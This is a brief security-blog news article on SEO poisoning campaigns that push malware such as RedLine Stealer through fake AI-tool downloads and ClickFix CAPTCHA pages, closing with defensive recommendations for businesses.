SEO Poisoning Campaign Delivers Malware Disguised as AI Tools

Illustration of a cybersecurity warning on a laptop screen highlighting SEO poisoning targeting SMBs

By Johnny Watts (aka Kaotick Jay) - ZeroVector Cyber Defense
Published: July 8, 2025
Estimated Reading Time: 2 minutes
Category: Cybersecurity Threats

Cybercriminals are orchestrating sophisticated SEO poisoning campaigns to target small- and medium-sized businesses (SMBs), exploiting their growing reliance on AI and collaboration tools.

Recent research by Kaspersky and Varonis exposes a surge in malicious advertising campaigns where attackers purchase ad space to promote seemingly legitimate downloads. These poisoned search results impersonate trusted names such as ChatGPT, Zoom, Google Drive, Microsoft Teams, and Salesforce. Victims are redirected to pages mimicking official tech support portals for companies like Apple, HP, Microsoft, PayPal, and Netflix.

The attack flow often includes fake Cloudflare CAPTCHA pages that employ the ClickFix technique to deploy malware loaders such as Hijack Loader, which in turn drops the RedLine Stealer. This malware can extract credentials, clipboard contents, cryptocurrency wallet keys, and silently install further payloads.

One campaign involved a falsified update for the Pi Network desktop app for Windows, designed to exfiltrate sensitive user data while bypassing antivirus detection. IT administrators are a primary target due to their elevated privileges and role in managing infrastructure.

Further exacerbating the risk, Varonis discovered a critical vulnerability in Azure’s AZNFS-mount utility used in HPC and AI images. In one documented intrusion, threat actors extracted nearly a terabyte of data from the compromised environment before encrypting VMware ESXi systems and issuing a ransom demand. Attackers also deployed surveillance software—camouflaged as grabber.exe—based on Kickidler, to monitor victim activity and capture credentials.

This campaign underscores a disturbing evolution in cyber threat tactics—blending SEO manipulation, social engineering, and technical exploitation to compromise unsuspecting organizations. These operations rely heavily on the trust users place in search engines and the growing use of AI tools in business settings.

How to Defend Against SEO Poisoning

Only download tools directly from official vendor websites—avoid sponsored links.
Train IT personnel to recognize SEO poisoning tactics and phishing behavior.
Use EDR/XDR solutions that offer behavioral detection and sandboxing.
Regularly audit cloud infrastructure for preinstalled but vulnerable tools.
Implement proper segmentation, backup, and incident response policies.

Given the scale and precision of these campaigns, it is imperative for organizations to harden their environments, vet download sources, and stay informed of emerging cybercrime techniques.

Sources:
The Hacker News | HackRead